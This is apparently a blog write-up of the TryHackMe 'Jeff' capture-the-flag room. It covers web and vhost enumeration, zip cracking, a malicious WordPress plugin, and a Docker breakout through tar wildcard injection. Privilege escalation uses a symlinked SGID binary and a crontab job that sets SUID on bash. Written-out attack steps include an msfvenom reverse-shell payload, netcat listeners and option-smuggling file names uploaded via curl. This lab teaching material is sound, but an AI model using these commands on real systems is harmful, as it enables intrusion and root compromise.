TryHackMe: Jeff — Writeup

Room difficulty: Hard
Topics: Web server enumeration, wordpress exploitation, working with vhosts, cracking encrypted zip files, docker container breakout, php code analysis and horizontal & vertical privilege escalation.

Photo by Mika Baumeister on Unsplash

Port scanning

I started with a simple nmap TCP port scan, and by the ouput we can see that there’s nothing beyond the usual.

Only two ports are open, 22/tcp (running OpenSSH 7.6p1) and 80/tcp (running nginx). Command: nmap -sC -sV -T4 machine_ip -p-

Web server enumeration & vhost discovery

The webserver’s main page appears to be completely empty, but viewing it’s source code, we see a hint

So, let’s add jeff.thm to the /etc/hosts file as so:

And now we can begin searching for valid subdomains and directories. To do so, gobuster fits our needs.

Running gobuster vhost mode with a DNS wordlist from seclists, we’re able to find a valid subdomain: wordpress.jeff.thm. Don’t forget to add it to your /etc/hosts file.

And running gobuster dir mode with the medium directory wordlist from dirbuster, we’re able to find 4 paths to follow: /uploads, /admin, /assets, /backups

There’s nothing interesting at jeff.thm main page, at /uploads there’s an upload form that does absolutely nothing, /admin is blank, /assets gives us a 403 (Forbidden), leaving us left with /backups, which is the right path to follow.
I ran gobuster dir mode with the same wordlist, but updated url value to http://jeff.thm/backups and added an option to include extensions at the end of each word. The extensions I added are common backup extensions like .tar, .zip, .rar, .7z and .bak. After a while, found a valid backup file: http://jeff.thm/backups/backup.zip

Cracking encrypted backup zip file

We can download the backup file at /backups/backup.zip, but cannot unzip it because it’s encrypted.

We can use JohnTheRipper and it’s scripts to try to crack the file. As it’s a zip file, we need to use zip2john.py to convert it to a format that john can understand and worth with.

And we find a valid password for the zip file (REDACTED).

Unzipping the backup, we can find a valid password for the wordpress user at wpadmin.bak

Wordpress exploitation & initial shell

Using the previously found password, we’re able to log in as “jeff ”at wordpress.jeff.thm/wp-login.php

After trying for a while to get a reverse shell by the usual ways, like editing a php file from the theme and etc. the only way I could find to achieve it was uploading a malicious plugin. Links: Source // Download
Go to plugins > add new > upload plugin > select the zip file, install it and activate it.

We could exploit this vulnerability manually, but there is a metasploit module that can do this for us automatically. Run msfconsole on your attacking machine, and follow the steps below.

Remember to change LHOST value to YOUR TUN0 IP ADDRESS (ifconfig tun0)

Docker container breakout

Whoa, we received a reverse shell connection, but sadly we’re in a docker container. We can confirm that by many means, but the most common is the presence of the file /.dockerenv.

We are the user ‘www-data’, the user which is responsible for the webserver. Checking /var/www/html folder, we find an interesting php file /var/www/html/ftp_backup.php

The script is uploading files to the ftp server on the host machine, and the host machine is doing something with these files. As it is a backup script, we can assume the host machine is compressing all files inside the directory to create a local backup. The correct path to follow is TAR wildcard exploitation.

Exploitation process

1. Enumerating - FTP Server

[Victim machine]$ curl -s -v -P - ‘ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1'

2. Exploiting - Tar

[Victim machine]$ echo ‘’ > ‘--checkpoint-action=exec=sh shell.sh’
[Victim machine]$ echo ‘’ > ‘--checkpoint=1’

*Must be inside a writable folder, like /dev/shm*

3. Exploiting - Shell generation

[Attacking machine]$ msfvenom -p cmd/unix/reverse_python lhost=YOUR-TUN0-IP lport=1234 R

Then, copy the output and save to ‘shell.sh’ on the victim machine, or use a python webserver and wget to transfer the file.

5. Uploading to the ftp server and running a netcat listener

[Victim machine]$ curl -T “--checkpoint-action=exec=sh shell.sh” -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Victim machine]$ curl -T “--checkpoint=1” -P - 'ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Victim machine]$ curl -T shell.sh -P - ‘ftp://backupmgr:PASSWORD-REDACTED@172.20.0.1/files/'
[Attacking machine]$ netcat -lvnp 1234

Horizontal privilege escalation

There are two valid users with home directory in the machine, jeff and backupmgr (us). Searching for files owned by jeff, we can find a binary and a backup file owned by jeff and only readable by him and the group ‘pwman’.

We can transfer /opt/systools/systool to our machine and analyze further using reverse engineering tools. As this appears to be a simple ELF executable, viewing the text inside of it using the tool ‘strings’ show us some interesting information.

This binary’s permissions are peculiar, there is a SGID bit set on it, and that means we can run it with pwnman’s group permissions.

Exploitation

[Victim machine]$ cd /opt/systools
[Victim machine]$ rm message.txt
[Victim machine]$ ln -s /var/backups/jeff.bak message.txt
[Victim machine]$ ./systool
Choose your option: 2

Doing so, we’re able to log in as jeff using his password running $su jeff
The user flag is not hashed and it needs to be. Run:
$ echo -n FLAG | md5sum

Vertical privilege escalation

As we have jeff’s password, we can view if he can run something as another user, like root, running $ sudo -l

Seems like jeff’s shell has some restrictions and commands are returning error. To solve this, we can use python

$ python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are many ways we can abuse crontab, but I chose to create a malicious python script inside /dev/shm, that will execute a system command (chmod +s /bin/bash), giving me the rights to run /bin/bash with root permissions.

It is a little bit unstable to use a text editor in this type of shell, so I used cat<<EOF> method. To edit the crontab, follow these steps:

$ sudo crontab -e
1. Scroll down to the bottom
2. Press: I
3. Paste this: * * * * * /usr/bin/python3 /dev/shm/script.py
4. Press: Esc, then : and type wq! to save and quit
5. Wait about 1 minute and run:
$ /bin/bash -p

Conclusion

Very cool machine, which covered a bunch of interesting topics and took me a lot of time in order to complete the box, really testing my ‘tryhard’ mentality. I hope you enjoyed my explanation, and really recommend you go check it out this room on TryHackMe!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store